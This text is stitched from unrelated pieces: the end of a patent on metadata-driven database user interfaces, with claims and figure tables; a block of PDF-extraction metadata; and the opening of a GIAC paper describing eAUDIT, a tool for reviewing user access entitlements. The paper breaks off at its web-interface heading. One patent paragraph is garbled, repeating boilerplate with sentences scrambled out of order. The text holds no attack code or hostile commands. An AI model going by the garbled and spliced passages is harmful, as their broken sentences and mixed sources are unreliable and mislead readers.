The Completion Behavior element 205 comprises instructions in the form of a structure list of Entity Types 15 (e.g., Assembly XYZ) and associated Data Package Types 94. The instructions create a new, subordinate Data Package 150' with the specified data Package Type 94 for each new instance of the specified Entity Type 15 created in the parent Data Package 150. For example, the completion behavior 205 for a "Create System" Taskspec 13 could include:
"Entity Type 15: Subsystem, Associated Data Package Type: Subsystem DP,"
"Entity Type: Element, Associated Data Package Type: Element DP."
These instructions indicated that a "System" may contain either Subsystems or Elements as subordinate data that should be mapped into new Data Packages 150'.
The above steps allow a domain expert to create a complex user interface that is tailored to their specific data subset domain 151 within a database 10' without the need to write new software. The results of the preceding steps of the method 200 are recorded into a predefined metadata structure and an administrative data structure 19 that are then interpreted by generic software 61 executing on a processor 60 to produce domain specific pages of the GUI 80.
FIG. 6 is an exemplary GUI 80 that may be used to create a Viewspec 11 by a user 99. After establishing all of the data definitions discussed above required to support a Viewspec 11, the Viewspec can be built by associating these data definitions. The GUI 80 allows the user 99 to pick a data definition at a first level and the select a subsequent data definition that can be linked with the first data definition such that the second data definition acts as a sub-query for the first data definition. The constructed Viewspec 11 can then be named and stored for future use.
As can be seen from inspection of FIG. 6, the first level of inquiry/report is "VS-1 Symptoms." The second or subordinate level of inquiry is data concerning symptoms and those failure modes that cause the symptoms. An additional second level of inquiry concerns the interactive tests for those symptoms that cause the failure modes. The Viewspec does not contain or store data in any of the underlying application database tables 10'. The data for the date definitions is a subset of the application data in database 10. The Viewspec 11 prospects for pieces of pertinent information from different existing tables that is only pertinent to the user's Data Package 150 and Work package 92.
At process 315 the database 10 is searched for "Corrective Action" 86 and "FM has Interactive Tests" 88. Those skilled in the art with a convenient road map for rather, the foregoing detailed description will provide applicability, or configuration of the invention in any way. Only examples, and are not intended to limit the scope, exemplary embodiment or exemplary embodiments are presented in the foregoing detailed description of the invention, it should be appreciated that a vast number of variations exist. It should also be appreciated that the exemplary embodiment or exemplary embodiments are only examples, and are not intended to limit the scope, applicability, or configuration of the invention in any way. Rather, the foregoing detailed description will provide those skilled in the art with a convenient road map for implementing an exemplary embodiment of the invention. It being understood that various changes may be made in the function and arrangement of elements described in an exemplary embodiment without departing from the scope of the invention as set forth in the appended claims.
Claims
1. A computer executed method for creating a complex graphical user interface on a display device via generic computer readable database software executable on a processor to manage only a specific data subset domain of application data in a database, the method comprising:
creating metadata defining a specific data subset domain, the metadata including a report specification and a view specification;
defining attribute metadata, entity metadata and relationship metadata for the specific data subset domain;
specifying a data package specification for the specific data subset domain;
specifying a data package hierarchy within the specific data subset domain;
specifying a view specification for the user group;
associating the view specification with the report specification; and
releasing the generic software application to a user.
2. The method of claim 1, wherein creating metadata includes defining a task specification, a task specification comprising a subset of the metadata that controls a sequence of steps performed by the processor that provides the application data from the database for a work package that is defined by a work package specification.
3. The method of claim 2, wherein a work package specification is a subset of the metadata that specifies the view specification and task specification for the processor that will be used to create the work package.
4. The method of claim 1, wherein the metadata defining a data subset domain comprises definitions for all entity types, attribute types, relationship types and primary keys for the application data being displayed.
5. The method of claim 1, wherein the entity metadata comprises a table name, a primary key and a long
name.
6. The method of claim 1, wherein the Relationship metadata comprises a source entity type, a destination entity type, a forward name, a reverse name and cardinality rules.
7. The method of claim 1, wherein the attribute metadata comprises an entity name, and attribute spec, a display name, and attribute type and attribute editor and constraints.
8. A computer program product recorded on a non-transitory storage medium comprising steps for creating a complex graphical user interface on a display device via generic computer readable database software to manage only a specific data subset domain of application data in a database, the steps comprising:
- creating metadata defining a specific data subset domain, the metadata including a report specification and a view specification;
- defining attribute metadata, entity metadata and relationship metadata for the data subset domain;
- specifying a data package specification for the specific data subset domain;
- specifying a data package hierarchy within the specific data subset domain;
- specifying a user group for the specific data subset domain;
- specifying a view specification for the user group;
- associating the view specification with the report specification; and
- releasing the generic computer readable database software to a user.
FIG. 4
## TASKS (Aka Task Network)
<table>
<thead>
<tr>
<th>PRODUCT NAME</th>
<th>WORK PACKAGE NAME</th>
</tr>
</thead>
<tbody>
<tr>
<td>BASELINE</td>
<td>DEFINE SYSTEMS</td>
</tr>
<tr>
<td>SYSTEM 1</td>
<td>DEFINE SUBSYSTEMS FOR SYSTEM 1</td>
</tr>
<tr>
<td>SUBSYSTEM 1.1</td>
<td>DEFINE ELEMENTS FROM SUBSYSTEM 1.1</td>
</tr>
<tr>
<td>ELEMENT 1.1.1</td>
<td>DEFINE DATA FOR ELEMENT 1.1.1</td>
</tr>
<tr>
<td>SUBSYSTEM 1.1</td>
<td>AUDIT AND FINALIZE DATA FOR SUBSYSTEM 1.1</td>
</tr>
<tr>
<td>SUBSYSTEM 1.2</td>
<td>DEFINE ELEMENTS FROM SUBSYSTEM 1.2</td>
</tr>
<tr>
<td>ELEMENT 1.2.1</td>
<td>DEFINE DATA FOR ELEMENT 1.2.1</td>
</tr>
<tr>
<td>ELEMENT 1.2.1</td>
<td>DEFINE DATA FOR ELEMENT 1.2.1</td>
</tr>
<tr>
<td>SUBSYSTEM 1.2</td>
<td>AUDIT AND FINALIZE DATA FOR SUBSYSTEM 1.2</td>
</tr>
<tr>
<td>SYSTEM 1</td>
<td>AUDIT AND FINALIZE DATA FOR SYSTEM 1</td>
</tr>
<tr>
<td>SYSTEM 2</td>
<td>DEFINE SUBSYSTEMS FOR SYSTEM 2</td>
</tr>
<tr>
<td>SUBSYSTEM 2.1</td>
<td>DEFINE ELEMENTS FOR SUBSYSTEM 2.1</td>
</tr>
<tr>
<td>ELEMENT 2.2.1</td>
<td>DEFINE DATA FOR ELEMENT 2.2.1</td>
</tr>
<tr>
<td>ELEMENT 2.2.1</td>
<td>DEFINE DATA FOR ELEMENT 2.2.1</td>
</tr>
<tr>
<td>SUBSYSTEM 2.1</td>
<td>AUDIT AND FINALIZE DATA FOR SUBSYSTEM 2.1</td>
</tr>
<tr>
<td>SYSTEM 2</td>
<td>AUDIT AND FINALIZE DATA FOR SYSTEM 2</td>
</tr>
<tr>
<td>BASELINE</td>
<td>AUDIT AND FINALIZE DATA FOR BASELINE</td>
</tr>
<tr>
<td>BASELINE</td>
<td>PUBLISH OUTPUT REPORTS AND DATA SETS</td>
</tr>
</tbody>
</table>
**FIG. 5**
<table>
<thead>
<tr>
<th>DELETE</th>
<th>MAIN REPORT</th>
<th>SUB-REPORT</th>
<th>MAIN REPORT ATTRIBUTE</th>
<th>SUB-REPORT ATTRIBUTE</th>
<th>LEVEL</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>VS1 - SYMPTOMS</td>
<td>✔</td>
<td>SYMPTOM CAUSES FAILURE MODES</td>
<td>✔</td>
<td>SYMPTOM</td>
</tr>
<tr>
<td>✔</td>
<td>VS1 - SYMPTOM CAUSES FAILURE MODES</td>
<td>✔</td>
<td>VS1-FM HAS CORRECTIVE ACTIONS</td>
<td>✔</td>
<td>FAILURE MODE</td>
</tr>
<tr>
<td>✔</td>
<td>VS1 - SYMPTOM CAUSES FAILURE MODES</td>
<td>✔</td>
<td>VS1-HAS INTERACTIVE TESTS</td>
<td>✔</td>
<td>FAILURE MODE</td>
</tr>
</tbody>
</table>
VIEWSPEC NAME: TIMS VIEW SPEC
ADD REPORT | MODIFY VIEWSPEC | COPY VIEWSPEC | CANCEL
The below are the reports used in the view spec. Click to modify them:
- VS1-SYMPTOMS
- VS1-FM HAS CORRECTIVE ACTIONS
- VS1-FM HAS INTERACTIVE TESTS
- VS1-SYMPTOM CAUSES FAILURE MODES
Create new report
**FIG. 6**
FIG. 8 Cont.
|
{"Source-Url": "https://patentimages.storage.googleapis.com/8a/62/93/073dd4d0a70db6/EP2779035A2.pdf", "len_cl100k_base": 11993, "olmocr-version": "0.1.53", "pdf-total-pages": 21, "total-fallback-pages": 0, "total-input-tokens": 46084, "total-output-tokens": 12962, "length": "2e13", "weborganizer": {"__label__adult": 0.0002818107604980469, "__label__art_design": 0.0004973411560058594, "__label__crime_law": 0.0004072189331054687, "__label__education_jobs": 0.0021228790283203125, "__label__entertainment": 8.553266525268555e-05, "__label__fashion_beauty": 0.00012993812561035156, "__label__finance_business": 0.0011663436889648438, "__label__food_dining": 0.0002388954162597656, "__label__games": 0.0008463859558105469, "__label__hardware": 0.001712799072265625, "__label__health": 0.00024127960205078125, "__label__history": 0.0002963542938232422, "__label__home_hobbies": 0.00011116266250610352, "__label__industrial": 0.000644683837890625, "__label__literature": 0.00030541419982910156, "__label__politics": 0.00016498565673828125, "__label__religion": 0.00030303001403808594, "__label__science_tech": 0.038848876953125, "__label__social_life": 5.650520324707031e-05, "__label__software": 0.07666015625, "__label__software_dev": 0.8740234375, "__label__sports_fitness": 0.0001461505889892578, "__label__transportation": 0.0004334449768066406, "__label__travel": 0.0001475811004638672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 59139, 0.01762]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 59139, 0.56034]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 59139, 0.90218]], "google_gemma-3-12b-it_contains_pii": [[0, 587, false], [587, 6488, null], [6488, 11663, null], [11663, 17893, null], [17893, 24070, null], [24070, 29632, null], [29632, 35891, null], [35891, 41978, null], [41978, 47598, null], [47598, 52495, null], [52495, 55347, null], [55347, 56665, null], [56665, 56665, null], [56665, 56665, null], [56665, 56665, null], [56665, 56672, null], [56672, 58347, null], [58347, 59127, null], [59127, 59127, null], [59127, 59127, null], [59127, 59139, null]], "google_gemma-3-12b-it_is_public_document": [[0, 587, true], [587, 6488, null], [6488, 11663, null], [11663, 17893, null], [17893, 24070, null], [24070, 29632, null], [29632, 35891, null], [35891, 41978, null], [41978, 47598, null], [47598, 52495, null], [52495, 55347, null], [55347, 56665, null], [56665, 56665, null], [56665, 56665, null], [56665, 56665, null], [56665, 56672, null], [56672, 58347, null], [58347, 59127, null], [59127, 59127, null], [59127, 59127, null], [59127, 59139, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 59139, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 59139, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 59139, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 59139, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 59139, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 59139, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 59139, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 59139, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 59139, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 59139, null]], "pdf_page_numbers": [[0, 587, 1], [587, 6488, 2], [6488, 11663, 3], [11663, 17893, 4], [17893, 24070, 5], [24070, 29632, 6], [29632, 35891, 7], [35891, 41978, 8], [41978, 47598, 9], [47598, 52495, 10], [52495, 55347, 11], [55347, 56665, 12], [56665, 56665, 13], [56665, 56665, 14], [56665, 56665, 15], [56665, 56672, 16], [56672, 58347, 17], [58347, 59127, 18], [59127, 59127, 19], [59127, 59127, 20], [59127, 59139, 21]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 59139, 0.13889]]}
|
olmocr_science_pdfs
|
2024-12-09
|
2024-12-09
|
79aa9863de64eaa47f5fdad76fa71c3198d5a815
|
eAUDIT: Designing a generic tool to review entitlements
In a perfect world, identity and access management would be handled in a fully automated way. On their first day of work, new employees would receive all the required access to the systems they need in order to perform their job function. Over time, as their roles within the company evolved, these entitlements would be automatically adjusted. Unfortunately, we do not live in a perfect world. Access to systems is often cumulative, with employees keeping access they no longer require. This in turn poses a risk to the ent...
eAUDIT: Designing a generic tool to review entitlements
GIAC (GCC) Gold Certification
Author: François Bégin, francois.begin@telus.com
Advisor: Dr. Ray Davidson
Accepted: June 15th 2015
Abstract
In a perfect world, identity and access management would be handled in a fully automated way. On their first day of work, new employees would receive all the required access to the systems they need in order to perform their job function. Over time, as their roles within the company evolved, these entitlements would be automatically adjusted. Unfortunately, we do not live in a perfect world. Access to systems is often cumulative, with employees keeping access they no longer require. This in turn poses a risk to the enterprise: unneeded access can lead to abuses and increases the possibility of data leakage if an employee is social engineered. This paper proposes a system to help address this problem: eAUDIT is a custom-built, generic entitlement review system that can simplify the task of reviewing user entitlements. eAUDIT is well suited to cases where no such tool exists in an enterprise, but can also complement an identity management system that does not fully cover all systems and applications. This paper covers the design of eAUDIT as well as an overview of its implementation, including sample code.
Доверяй, но проверяй
Trust, but verify
Russian proverb
Special thanks to my A-Team of coders, Kobe Lin and Jaya Balasubramaniam, who made eAUDIT happen.
François Bégin, francois.begin@telus.com
1. Introduction
When a new employee joins a company, he should be automatically provided an identity within this company as well as various methods to authenticate himself. These authentication methods can take various forms: a physical access badge, a centrally-managed username and password, a virtual smart card carrying a cryptographically signed certificate, etc. Once an identity has been established for the new employee, this identity should be automatically associated with all the access entitlements he requires to perform his job functions. From that point on, as the employee progresses in his career, it is fairly likely that he will change teams, roles and positions. At every such milestone, his entitlements should be automatically re-adjusted, ensuring that he always has the access he requires. This will ensure that the employee’s access is limited to the resources he requires, a key element of a good authorization policy (Ballad, Ballad, and Banks, 2010).
This, of course, is an idealized description of Identity and Access Management (IAM), which is of great value to any enterprise. But IAM can be challenging. As Mather, Kumaraswamy and Latif (2009) aptly pointed out, “Many of these [IAM] initiatives are entered into with high expectations, which is not surprising given that the problem is often large and complex.”
This is particularly true for organizations that have grown through mergers and acquisition, as well as for organizations that have existed for decades and rely on legacy systems. Building IAM hooks (if that is even an option) into these systems can be costly or complicated. Sometimes, the best approach is to retain existing entitlements and address any access management gaps by conducting regular reviews of these entitlements to prune the ones that are no longer required.
Building a system that can conduct regular entitlement reviews is in itself a significant project, best handled by following a software development life cycle model. As part of the pre-development activities, one element of the discussion will invariably touch upon whether to develop the software functions in-house, outsource them, get an off-the-shelf package, or adapt and reuse exiting software (Saleh, 2009). While there are commercial products that can help conduct reviews of entitlements, these tools are often
tied to large, costly products related to both IAM and Governance, Risk and Compliance (GRC) management. This paper chooses the first path: a custom-built solution. The main argument in favor of this choice is that, with a suitably clear scope, such a tool can be built and deployed at limited cost and provide a quick and significant benefit to an enterprise that does not have this capability. The tool presented here is called eAUDIT and can achieve a simple goal of providing a custom-made solution for entitlement review. The scope, design and high-level implementation of this tool are covered in this paper.
2. eAUDIT
2.1. Defining the elements of an entitlement audit
Prior to diving into the main topic, some of the key words that will be used throughout this paper need to be clearly defined.
In this paper, an entitlement refers to a privilege that has been granted to a user. Typical examples of entitlements include authorization to access a particular software application/data source, privileged access to a system or application, etc. Note that entitlements are granular: if a specific system has different levels of access, e.g. read access vs. read/write access, each of these count as a separate entitlement. The goal of an audit is to determine whether or not the entitlement is still valid.
An authorizer is defined as the person (or persons) who can grant someone a specific entitlement. In many organizations, managers often take on that role for their direct reports. This is supported by the fact that managers are well positioned to assess the business needs related to this type of access. Security professionals who may wish for more access control enforcements should be reminded that “Business will always trump security […]” (Kadrich, 2007). With that said, a manager is not always the main authorizer, as some systems have a specific business owner who plays that role.
Entitlements are granted to entities. In most cases, an entity will simply be an employee of the company, but since the goal of eAUDIT it to create a system that is purely generic, the word ‘entity’ is used instead. For instance, an audit could be conducted against physical access cards that are not associated directly to a user e.g.
generic access cards for escorted access that are left in the care of the security guard desk. These cards are a good example of a business need (convenience of being able to provide quick access to vendors on support calls) that outweighs security concerns (difficulty in associating a specific user to these cards).
One of the key elements of eAUDIT is its generic nature. Entities can be anything and the various characteristics that these entities possess can also be anything. In the previous example, badge entities can have attributes such as: Badge ID, Badge Label, Manager (if applicable), Badge Type, Expiry Date, etc., as shown in Table 1.
<table>
<thead>
<tr>
<th><strong>Primary attributes</strong></th>
<th><strong>Secondary attributes</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Badge ID</td>
<td></td>
</tr>
<tr>
<td>Badge Label</td>
<td></td>
</tr>
<tr>
<td>Manager (if applicable)</td>
<td></td>
</tr>
<tr>
<td>Badge Type</td>
<td></td>
</tr>
<tr>
<td>Expiry date</td>
<td></td>
</tr>
<tr>
<td>1000000 Penny Robinson</td>
<td>Employee badge 2020-01-01</td>
</tr>
<tr>
<td>1000001 Guard Desk</td>
<td>Generic cards 2015-12-31</td>
</tr>
</tbody>
</table>
Table 1. Mockup data for an audit of physical access badges.
In another example such as Table 2, where entities are defined as employees, the attributes of these employees would be different: Employee ID, First Name, Last Name, Title, Computer ID, City, etc.
<table>
<thead>
<tr>
<th><strong>Primary attributes</strong></th>
<th><strong>Secondary attributes</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Employee ID</td>
<td></td>
</tr>
<tr>
<td>First Name</td>
<td></td>
</tr>
<tr>
<td>Last Name</td>
<td></td>
</tr>
<tr>
<td>Title</td>
<td></td>
</tr>
<tr>
<td>Computer ID</td>
<td></td>
</tr>
<tr>
<td>City</td>
<td></td>
</tr>
<tr>
<td>200002 Don West Pilot</td>
<td>LX73-26 Toronto</td>
</tr>
<tr>
<td>200003 Judy Robinson Zoologist</td>
<td>LD04-34 Edmonton</td>
</tr>
</tbody>
</table>
Table 2. Mockup data for an audit of employee.
eAUDIT users are those individuals responsible to conduct audits based on any type of entities and/or attributes. Giving eAUDIT users the ability to define their own attributes to meet their needs is crucial. In eAUDIT, entity attributes are therefore referred to as user-defined entity attributes (UDEA). Furthermore, a distinction is made between primary attributes and secondary attributes. Primary attributes are those attributes that normally suffice to an authorizer for an entitlement review. Secondary attributes contain extra information that an authorizer may need to consult to make a final
François Bégin, francois.begin@telus.com
determination. How these attributes are presented to authorizers will prove important when discussing the creation of the web interface for the audit engine.
### 2.2. Scope
Since eAUDIT is a custom-built design and implementation project, one of the most important aspects of this project is to provide a clear scope. This will avoid *scope creep*, which is one of the top five reasons why a project can fail (Doraiswamy and Shiv, 2012).
The main elements of eAUDIT’s scope are:
- Import generic data by relying on user-defined entity attributes.
- Present a simple landing page to authorizers, showing them active audits that need their attention.
- Present a simple entitlement review page where all entities are listed in a sortable/filterable data table. The data table will show the primary entity attributes (always) and secondary attributes (on demand) to the authorizer.
- Conduct entitlement review based on binary responses (confirm | revoke) through a single click for each entity.
- Support for multiple authorizers for any given entitlement.
- Ability to group similar entitlements together.
The last point is important to clarify: in eAUDIT, a given audit can cover more than one entitlement, provided that all entities have the same attributes. For example, consider Table 3, a mockup of the entitlement review page presented to an authorizer:
In this particular audit, John Robinson is responsible for three different entitlements: *R* Main Data Center, *R* DR Site and *R* Wire Center. Since all these entitlements are similar in nature – and since they all relate to the same type of entities with the same attributes (badges granting physical access to buildings) – they are all part of the same meta-audit. Section 2.5 will discuss how the web interface will support the authorizers who are faced with multiple entitlements to review.
When entities and their attributes are loaded at the start of an audit, they are locked-in for the duration of the audit. This is an important design decision that warrants some additional explanation: after all, if we are reviewing administrative access to company-issued laptops, should users be added and removed from the audit if they are granted those rights while the audit is taking place?
Although this may appear to provide a more accurate representation of the data, the complications associated with auto-adjusting the dataset greatly outweigh the benefits of a locked-in audit. In some cases, data will be loaded in eAUDIT through a spreadsheet. Re-creating the spreadsheet throughout the audit would be time-consuming, and additional code would be required to adjust the existing data to handle deltas. Furthermore, audits conducted by eAUDIT typically last 3-4 weeks. These short audit windows are another mitigating factor. Rather than capturing in-flight deltas, eAUDIT will strive for a high success rate and repeated audits throughout the year. With all of this said, if data is loaded dynamically inside eAUDIT through an adapter, then that adapter can be written to handle in-flight changes.
François Bégin, francois.begin@telus.com
2.3. Design
As previously alluded to, the design of eAUDIT (Figure 1) is fairly simple. At a high level, entitlement data needs to be acquired from various data sources, and then presented to authorizers for review. Section 2.4 covers data acquisition in more detail. How the data ends up in the database is critical. eAUDIT needs to handle generic data efficiently. Taking a page from Jurney (2013): “In choosing our tools, we seek linear scalability, but above all, we seek simplicity”, the data model for eAUDIT seeks simplicity. In Jurney’s case, he was referring to NoSQL big data tools, but his comment is just as applicable to a traditional SQL database. eAUDIT’s data is held in a SQL database, with a simple data model (see Appendix A). Let us consider the data model and go over some of the key characteristics.
The AuditTypeReference table (figure 2) holds the base audit type information, such as the name and description of the audit, a start and end date and some instructions. This is where the overall type of audit is defined: reviewing active contractors at TELUS, reviewing badges with *R* profiles attached, etc. Since TELUS is a bilingual company, various key fields are held in two separate fields (EN | FR), which will be required by the Web interface.
The AuditTypeReference table also holds the labels for the primary and secondary User Defined Entity Attributes (UDEA) fields. Initially, a pre-defined set of fields was considered e.g. UDEAPrimaryField1, UDEAPrimaryField2, etc. but this set a hard limit as well as being less than esthetically pleasing from a data model perspective. Another approach considered was a mapping table that would hold as many of these user-defined fields as required, with a many-to-one relationship with the AuditTypeReference table. In the end though, a simple and elegant solution was chosen: the UDEA fields hold the labels in JSON format. Figure 3 shows examples of primary and secondary fields (labels) for two different types of audits:
<table>
<thead>
<tr>
<th>AuditName</th>
<th>UDEAPrimaryFieldsEN</th>
<th>UDEASecondaryFieldsEN</th>
</tr>
</thead>
<tbody>
<tr>
<td>eSAM active contractors audit</td>
<td>{'Emp ID', 'First Name', 'Last Name', 'SAP ID', 'Mgr ...'}</td>
<td>['Contractor Type', 'Province', 'Vendor', 'Access']</td>
</tr>
<tr>
<td>Restricted profiles in data centers</td>
<td>{'Emp ID', 'First Name', 'Last Name', 'Mgr ID', 'Mgr ...'}</td>
<td>['Cards']</td>
</tr>
</tbody>
</table>
Figure 3. User-defined entity attributes fields for two different audits.
Table Audit (Figure 4) defines the actual entitlements being reviewed within an audit type. It also has a count of the total number of entities that bear each entitlement.
François Bégin, francois.begin@telus.com
Using our previous example of restricted profiles on access badges, this table would hold all the different types of restricted profiles that are to be reviewed (Figure 5). The table uses a foreign key to link itself to the AuditTypeReference table. It is the relationship between Audit and AuditTypeReference that allows eAUDIT to group similar entitlement reviews together.
<table>
<thead>
<tr>
<th>idAudit</th>
<th>TotalNumberOfEntities</th>
<th>Entitlement</th>
<th>CreatedDateTime</th>
<th>CreatedBy</th>
</tr>
</thead>
<tbody>
<tr>
<td>2006</td>
<td>52</td>
<td>"R" Main Data Center</td>
<td>2015-04-23 03:30:39</td>
<td>eAUDIT_BatchOps</td>
</tr>
<tr>
<td>2008</td>
<td>35</td>
<td>"R" DR Site</td>
<td>2015-04-23 03:30:39</td>
<td>eAUDIT_BatchOps</td>
</tr>
<tr>
<td>2009</td>
<td>47</td>
<td>"R" Wire Center</td>
<td>2015-04-23 03:30:40</td>
<td>eAUDIT_BatchOps</td>
</tr>
</tbody>
</table>
Figure 5. Different entitlements reviewed within the same audit.
The Entities table (Figure 6) is the one that holds a list of who (or what) was granted entitlements. This is where the UDEAprimaryFields and UDEAsecondaryFields from the AuditTypeReference table will find their counterparts, called UDEAprimaryFieldsValues and UDEAsecondaryFieldsValues respectively.
The values are saved in JSON format (see Figure 7), just like the labels. The choice of JSON as a format to hold field values may appear a little strange at first. After all, flattening all entities’ attributes in a single field will make SQL searches more expensive. But the main goal of eAUDIT is not efficient searches. The goal is to efficiently present datasets for entitlement review. The choice of JSON to keep labels and values is directly related to the web interface that will allow authorizers to conduct their review – and having field values in this format will prove useful once we start discussing eAUDIT’s web implementation in section 2.5.

**Figure 6.** Entities table in the eAUDIT database.

**Figure 7.** User-defined field values as kept in the Entities table.
The **EntitiesAuditReponses** table (Figure 8) holds the responses i.e. whether or not the authorizer confirmed or revoked the entitlement. Keeping this data in a separate table allows for fields such as `LastUpdatedDateTime` and `LastUpdatedBy` to capture who reviewed the entitlement. Although mentioned here, note that the full implementation of this table’s functionality is not covered in this paper.
François Bégin, francois.begin@telus.com
Finally, the **Authorizers** table (Figure 9) is where the authorizers of a particular Audit record are kept. This table has a many-to-one relationship to the Audit table, allowing multiple individuals to be named authorizers of a particular audit. TELUS uses a unique numerical value for its employee IDs, and this is reflected in field **AuthorizerEmpID**, which is defined as an integer value.
2.4. **Data acquisition**
Since eAUDIT is all about validating data, acquiring data is key to the tool. Not only that, but from the scope defined in section 2.2, data need to be acquired as easily as
possible. After all, if you cannot load authorizers, entitlements and entities into the eAUDIT database, you cannot review these records. To help with the acquisition of data, a java library called **jEAUDITlibrary** was created (Figure 10).

As would be expected from any other java library, jEAUDITlibrary contains classes for the main objects that are at the core of eAUDIT: *Audit, AuditTypeReference, Authorizers, Entities, and EntitiesAuditResponses*. These classes map to the data model (Appendix A) that was discussed in the previous section. There are also *Util classes that contains static methods related to these objects: AuditUtil, AuditTypeReferenceUtil, AuthorizersUtil, EntitiesUtil, and EntitiesAuditResponsesUtil*. The eAUDIT library relies on two external libraries: the standard MySQL java connector and a toolbox library called UnifiedToolBoxV2, which is mostly used to help manage SQL connections as well as provide logging capabilities.
François Bégin, francois.begin@telus.com
The source code for jEAUDITlibrary is available from the eAUDIT project page on GitHub ([https://github.com/francoisbegin/eAUDIT](https://github.com/francoisbegin/eAUDIT)). The project page also includes the source code for eAUDIT_BatchOps (Figure 11), a program that contains sample code to demonstrate data acquisition using the eAUDIT library. Appendix B gives a quick overview of how to set up an environment to use the library and eAUDIT_BatchOps.

Figure 11. Main classes of eAUDIT_BatchOps (supporting libraries not shown)
2.4.1. **Excel-driven data acquisition**
The first demo in eAUDIT_BatchOps covers data import from an Excel spreadsheet. This particular section of the code relies heavily on Apache POI, an open-source Java API for Microsoft Documents (Apache Foundation, 2015). Note that all libraries required by eAUDIT_BatchOps are included with the project.
A demo spreadsheet, **dataLoadExample.xlsx**, is included with the eAUDIT_BatchOps project (Figure 12)

This spreadsheet holds three separate sheets: **AuditTypeRef** (Appendix C) contains all the data required to create the AuditTypeReference record in the eAUDIT database. **AuditData** (Appendix D) contains all the data required to create the Authorizers, Entities and Audit records. Finally, **Notes** contains notes to help users fill in the template correctly.
This spreadsheet can be used as a template for Excel-driven data loads. It is built to support generic data. To add/remove primary and secondary user-defined entity attribute fields, one only has to create/delete columns in the AuditData sheet and set the top row label to either **UDEAprimary** or **UDEAsecondary**.
Multiple Authorizers per entitlements is supported by listing them under the Authorizers column and separating each authorizer by a semi-colon. As mentioned in section 2.3, authorizer’s IDs are expected to be integer values that map to the TELUS employee ID of the authorizer. Using eAUDIT at a company that relies on non-numerical employee IDs would require making modifications to the Authorizers class of jEAUDITlibrary.
Method **Ops_ExcelDataLoader.loadFromExcelTemplate** handles the spreadsheet data load, provided it matches the expected template. To demonstrate this, one can create a new directory called **dataLoad** under the base path of eAUDIT and copy the demo spreadsheet to that location. One then compiles and runs eAUDIT_BatchOps with the **loadFromExcelTemplate** switch (or runs it with that switch inside a Java IDE):
In the example shown in Figure 13, a new AuditTypeReference record with id = 4 was created. Under that audit type reference, 5 sub-audits were created to match the 5 different entitlements that were defined in the spreadsheet (Figure 14), and 43 entities will need to be reviewed (Figure 15).

Figure 13. Loading data into eAUDIT using a spreadsheet.
Obviously, loading data from a spreadsheet is not ideal. Dealing with spreadsheets comes with pitfalls such as sensitive data exposure (Walsh, 2014). Still, spreadsheet imports may prove useful in cases where an application/system does not have a simple API to extract the data, or when a support team is reluctant to provide direct access to its data.
Another well-known reality is that, in many cases, spreadsheets are all that people know (Allen, 2015). Asking a subject-matter expert to do an export of the key data, and massaging these data to fit the eAUDIT Excel template might be the path of least resistance to acquire audit data.
2.4.2. Adapter-driven data acquisition
A better solution to an Excel data-load is to write an adapter to retrieve the audit data from a system. In its current incarnation, eAUDIT does not provide a generic interface for such adapters, but the jEAUDITlibrary provides methods and classes to support their creation. Additionally, method Ops_AdapterDataLoad.loadFromAdapter() of eAUDIT_BathOps demonstrates the implementation of a simple adapter.
The first step in building a custom adapter is to determine how the data can be acquired programmatically. In this case, each solution will likely be custom-built. For instance, TELUS has developed a custom adapter to interact with the Lenel Onguard physical access system. Data acquisition was achieved by the use of two database service accounts: one account to interact with Lenel Onguard to obtain a list of badges and access profiles, and another account to interact with the database where authorizers of these access profiles are maintained. The adapter simply correlates the two data sources and feeds the resulting data to the eAUDIT database.
For an adapter data load, one must refer back to the data model and note that the Audit table is at the heart of the model. Contrary to all other tables in the model, its primary key, idAudit, is not an auto-increment field. This was done on purpose as it allows for the controlled creation of new records. When a custom-adapter needs to send data to the eAUDIT database, it needs to determine the next available idAudit value. Then, each new entitlement is assigned the next idAudit value. As this list is built up, the list of corresponding Authorizers and Entities records can also be built.
If all of these records were written one at a time, data loads would be woefully slow. A custom-built adapter should therefore take a different approach. In the demo code proposed in method loadFromAdapter(), a HashMap is built as the code iterates through all entities. If it finds a new entitlement, it creates a new Audit record and attaches to it the authorizers for that entitlement and the entity record. If it finds an
entitlement it already knows about, it retrieves it from the HashMap, increments field
Audit.TotalNumberOfEntities, and adds the new entity to previously correlated entities
for that particular entitlement. All of this is done in memory, inside the HashMap. A
special object called jEAUDITlibrary.AuditDataLoaderObject (Figure 16) is used to
organize all the data:
```java
public class AuditDataLoaderObject {
private int idAuditID;
private int idAuditTypeReference;
private Audit audit;
private ArrayList<Authorizers> auditAuthorizers;
private ArrayList<Entities> auditEntities;
}
```
Figure 16. Fields for java class AuditDataLoaderObject.
This object is a meta-object, which can hold all the key data: idAudit, the
corresponding Audit record, a list of Authorizers associated with the Audit record, and all
entities for that particular audit. Once the HashMap has been fully populated, a simple
call to method AuditDataLoaderObjectUtil.massLoad() handles batched writes to the
database. Compiling eAUDIT_BatchOps and running it with the -loadFromAdapter
switch demonstrates a simple adapter (Figure 17):
2.5. Web interface implementation
